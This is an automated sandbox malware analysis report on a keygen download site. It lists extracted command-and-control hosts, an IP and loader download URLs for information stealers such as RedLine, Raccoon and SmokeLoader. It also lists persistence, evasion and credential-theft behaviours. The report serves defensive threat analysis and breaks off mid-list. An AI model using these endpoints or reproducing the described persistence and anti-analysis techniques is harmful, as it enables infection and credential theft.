Analysis
-
max time kernel
534s -
max time network
604s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
29-03-2021 12:49
Static task
static1
URLScan task
urlscan1
Sample
https://keygenninja.com/
Behavioral task
behavioral1
Sample
https://keygenninja.com/
Resource
win10v20201028
Behavioral task
behavioral2
Sample
https://keygenninja.com/
Resource
win10v20201028
Behavioral task
behavioral3
Sample
https://keygenninja.com/
Resource
win10v20201028
General
Malware Config
Extracted
raccoon
4ce8ad65ffaa0dffa8cc56e03b4fd65c31c1a91d
-
url4cnc
https://telete.in/j90dadarobin
Extracted
redline
mix
giledah.xyz:80
Extracted
redline
newserver2
91.214.124.106:80
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/9312-709-0x00000000021E0000-0x0000000002AEA000-memory.dmp family_glupteba behavioral2/memory/9312-713-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/9312-708-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/6324-486-0x0000000002870000-0x00000000028A4000-memory.dmp family_redline behavioral2/memory/6324-475-0x00000000027B0000-0x00000000027E5000-memory.dmp family_redline behavioral2/memory/7652-627-0x0000000000400000-0x0000000000432000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 6188 created 2220 6188 WerFault.exe xal3k1mgbcp.exe PID 8464 created 6388 8464 WerFault.exe RunWW.exe PID 9856 created 4936 9856 WerFault.exe win1host.exe PID 8804 created 7704 8804 WerFault.exe bevkagomcxv.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/6180-664-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6180-667-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6180-691-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 13 IoCs
Processes:
MsiExec.exemsiexec.exeflow pid process 423 8136 MsiExec.exe 429 6180 msiexec.exe 441 8136 MsiExec.exe 491 8136 MsiExec.exe 500 8136 MsiExec.exe 511 8136 MsiExec.exe 500 8136 MsiExec.exe 500 8136 MsiExec.exe 441 8136 MsiExec.exe 423 8136 MsiExec.exe 511 8136 MsiExec.exe 511 8136 MsiExec.exe 491 8136 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
Processes:
DrvInst.exeMicrosoft.exeppppppfy.exedescription ioc process File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ppppppfy.exe File opened for modification C:\Windows\System32\drivers\SETDA07.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETDA07.tmp DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exemultitimer.exesetups.exeaskinstall20.exesetups.tmpCCD1.tmp.exemultitimer.exemultitimer.exeSetup3310.exexal3k1mgbcp.exeAwesomePoolU1.exevict.exefile.exevpn.exeIBInstaller_97039.exeeyys4yc1mqw.exeSetup3310.tmpvpn.tmp45y4koqd0ts.exeIBInstaller_97039.tmpvict.tmpapp.exelokpto41glk.exe45y4koqd0ts.tmpwin1host.exewinlthsth.exeSetup.exe433A.tmp.execustomer5.exehjjgaa.exeparse.exeRunWW.exejg7_7wjg.exeLabPicV3.exelylal220.exeRmSetp.exe22.exeUgEwD2Otfx9I.exeLabPicV3.tmplylal220.tmpMicrosoft.exeppppppfy.exemain.exejfiag3g_gg.exe4077614.exe4264480.exeWindows Host.exetapinstall.exeirecord.exePisysikyqu.exeirecord.tmpLyvolaquzha.exeprolab.exemd2_2efs.exeLuvaewekabe.exeLepaelimerae.exeprolab.tmpjfiag3g_gg.exepid process 4284 keygen-pr.exe 4612 keygen-step-1.exe 1440 keygen-step-2.exe 2772 keygen-step-3.exe 4628 keygen-step-4.exe 3296 key.exe 4132 Setup.exe 4436 multitimer.exe 5620 setups.exe 1508 askinstall20.exe 5128 setups.tmp 5624 CCD1.tmp.exe 3480 multitimer.exe 4272 multitimer.exe 4068 Setup3310.exe 2220 xal3k1mgbcp.exe 1156 AwesomePoolU1.exe 5640 vict.exe 5028 file.exe 4796 vpn.exe 4472 IBInstaller_97039.exe 2320 eyys4yc1mqw.exe 4652 Setup3310.tmp 1968 vpn.tmp 3892 45y4koqd0ts.exe 3888 IBInstaller_97039.tmp 2076 vict.tmp 2892 app.exe 5928 lokpto41glk.exe 988 45y4koqd0ts.tmp 4936 win1host.exe 5596 winlthsth.exe 6200 Setup.exe 6324 433A.tmp.exe 6364 customer5.exe 6372 hjjgaa.exe 6380 parse.exe 6388 RunWW.exe 6396 jg7_7wjg.exe 6404 LabPicV3.exe 6420 lylal220.exe 6428 RmSetp.exe 6448 22.exe 6456 UgEwD2Otfx9I.exe 6616 LabPicV3.tmp 6624 lylal220.tmp 6924 Microsoft.exe 7028 ppppppfy.exe 7036 main.exe 2240 jfiag3g_gg.exe 5248 4077614.exe 3732 4264480.exe 4304 Windows Host.exe 4420 tapinstall.exe 6148 irecord.exe 5692 Pisysikyqu.exe 4572 irecord.tmp 7172 Lyvolaquzha.exe 7260 prolab.exe 7280 md2_2efs.exe 7336 Luvaewekabe.exe 7348 Lepaelimerae.exe 7476 prolab.tmp 8176 jfiag3g_gg.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exesetup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exesetups.tmpWeather.exesetups.tmpLuvaewekabe.exePisysikyqu.exevict.execmd.execmd.exeWeather.exesetups.tmpdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation Luvaewekabe.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation Pisysikyqu.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation vict.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 64 IoCs
Processes:
setups.tmpSetup3310.tmpCCD1.tmp.exeIBInstaller_97039.tmpvict.tmplokpto41glk.exe45y4koqd0ts.tmpvpn.tmplylal220.tmpLabPicV3.tmpmain.exerundll32.exeMsiExec.exeapp.exeeyys4yc1mqw.exeMsiExec.exemain.exemain.exerundll32.exerundll32.exemask_svc.execlient32.exepid process 5128 setups.tmp 5128 setups.tmp 5128 setups.tmp 5128 setups.tmp 5128 setups.tmp 5128 setups.tmp 5128 setups.tmp 4652 Setup3310.tmp 4652 Setup3310.tmp 5624 CCD1.tmp.exe 3888 IBInstaller_97039.tmp 2076 vict.tmp 5928 lokpto41glk.exe 988 45y4koqd0ts.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 5624 CCD1.tmp.exe 5624 CCD1.tmp.exe 5624 CCD1.tmp.exe 5624 CCD1.tmp.exe 5624 CCD1.tmp.exe 5624 CCD1.tmp.exe 6624 lylal220.tmp 6616 LabPicV3.tmp 7036 main.exe 3740 rundll32.exe 7404 MsiExec.exe 7404 MsiExec.exe 7404 MsiExec.exe 2892 app.exe 2320 eyys4yc1mqw.exe 8136 MsiExec.exe 8136 MsiExec.exe 8136 MsiExec.exe 8136 MsiExec.exe 8136 MsiExec.exe 8136 MsiExec.exe 8136 MsiExec.exe 8136 MsiExec.exe 8136 MsiExec.exe 9152 main.exe 8136 MsiExec.exe 8988 main.exe 6816 rundll32.exe 7576 rundll32.exe 1188 mask_svc.exe 1188 mask_svc.exe 1188 mask_svc.exe 1188 mask_svc.exe 1188 mask_svc.exe 1188 mask_svc.exe 1968 vpn.tmp 1968 vpn.tmp 2948 client32.exe 2948 client32.exe 2948 client32.exe 2948 client32.exe 2948 client32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
Processes:
4264480.exeMicrosoft.exehjjgaa.exeparse.exeaipackagechainer.exemultitimer.exeppppppfy.exemultitimer.exeWeather_Installation.exe2CD0.exemultitimer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 4264480.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Nyshirikydae.exe\"" Microsoft.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" parse.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pvrpxnlr1ht = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\PVM8QWOMMT\\multitimer.exe\" 1 3.1617022315.6061cd6bc9127" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Install engine 16\\Hadoqoliju.exe\"" ppppppfy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\321o1jkig13 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\EPLFN276JQ\\multitimer.exe\" 1 3.1617022544.6061ce5050a7b" multitimer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ef91561d-6d25-4285-bf2b-b6a2d4a5b75f\\2CD0.exe\" --AutoStart" 2CD0.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run parse.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --anbfs" Weather_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\brucwrcn4cl = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RPGIDRZA2U\\multitimer.exe\" 1 3.1617022594.6061ce824613b" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Processes:
multitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
vict.exemd2_2efs.exejg7_7wjg.exemd7_7dfj.exemd7_7dfj.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vict.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe -
Drops Chrome extension 1 IoCs
Processes:
askinstall20.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json askinstall20.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
lokpto41glk.exemsiexec.exedescription ioc process File opened (read-only) \??\P: lokpto41glk.exe File opened (read-only) \??\Q: lokpto41glk.exe File opened (read-only) \??\S: lokpto41glk.exe File opened (read-only) \??\J: lokpto41glk.exe File opened (read-only) \??\G: lokpto41glk.exe File opened (read-only) \??\O: lokpto41glk.exe File opened (read-only) \??\Y: lokpto41glk.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: lokpto41glk.exe File opened (read-only) \??\V: lokpto41glk.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: lokpto41glk.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: lokpto41glk.exe File opened (read-only) \??\Z: lokpto41glk.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: lokpto41glk.exe File opened (read-only) \??\K: lokpto41glk.exe File opened (read-only) \??\M: lokpto41glk.exe File opened (read-only) \??\T: lokpto41glk.exe File opened (read-only) \??\U: lokpto41glk.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: lokpto41glk.exe File opened (read-only) \??\H: lokpto41glk.exe File opened (read-only) \??\N: lokpto41glk.exe File opened (read-only) \??\R: lokpto41glk.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: lokpto41glk.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: lokpto41glk.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: lokpto41glk.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 276 ipinfo.io 323 ip-api.com 416 checkip.amazonaws.com 449 ip-api.com 677 ipinfo.io 679 ipinfo.io 733 api.2ip.ua 274 ipinfo.io 372 checkip.amazonaws.com 637 checkip.amazonaws.com 731 api.2ip.ua 738 checkip.amazonaws.com -
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exemultitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 26 IoCs
Processes:
vict.tmptapinstall.exesetup.exesvchost.exesvchost.exesetup.exeDrvInst.exedescription ioc process File created C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\SETD515.tmp vict.tmp File opened for modification C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\SETD517.tmp vict.tmp File opened for modification C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907} vict.tmp File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File created C:\Windows\system32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\System32\Tasks\gwxWVhQsT svchost.exe File opened for modification C:\Windows\System32\Tasks\bmIXAqnwlcZKDlfrrr svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\oemvista.inf vict.tmp File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat vict.tmp File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\SETD515.tmp vict.tmp File opened for modification C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\SETD516.tmp vict.tmp File created C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\SETD516.tmp vict.tmp File created C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\SETD517.tmp vict.tmp File opened for modification C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\tap0901.sys vict.tmp File created C:\Windows\System32\DriverStore\drvstore.tmp vict.tmp File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys vict.tmp File opened for modification C:\Windows\System32\Tasks\gAmifXGUX svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\GXFS0T7X.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\GXFS0T7X.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{472be508-9a90-7644-809e-3536e36e4907}\tap0901.cat vict.tmp File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf vict.tmp File opened for modification C:\Windows\System32\CatRoot2\dberr.txt vict.tmp File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 0100854C2C0C619C svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes:
parse.exeparse.exeConhost.exemask_svc.exemask_svc.exemask_svc.exepid process 6380 parse.exe 6784 parse.exe 8 Conhost.exe 6380 parse.exe 6784 parse.exe 8 Conhost.exe 6380 parse.exe 6784 parse.exe 8 Conhost.exe 10220 mask_svc.exe 8104 mask_svc.exe 1188 mask_svc.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
svchost.exeUgEwD2Otfx9I.exeparse.exedescription pid process target process PID 1248 set thread context of 4116 1248 svchost.exe svchost.exe PID 6456 set thread context of 7652 6456 UgEwD2Otfx9I.exe AddInProcess32.exe PID 1248 set thread context of 6664 1248 svchost.exe svchost.exe PID 6380 set thread context of 7608 6380 parse.exe msiexec.exe PID 6380 set thread context of 6180 6380 parse.exe msiexec.exe -
Drops file in Program Files directory 64 IoCs
Processes:
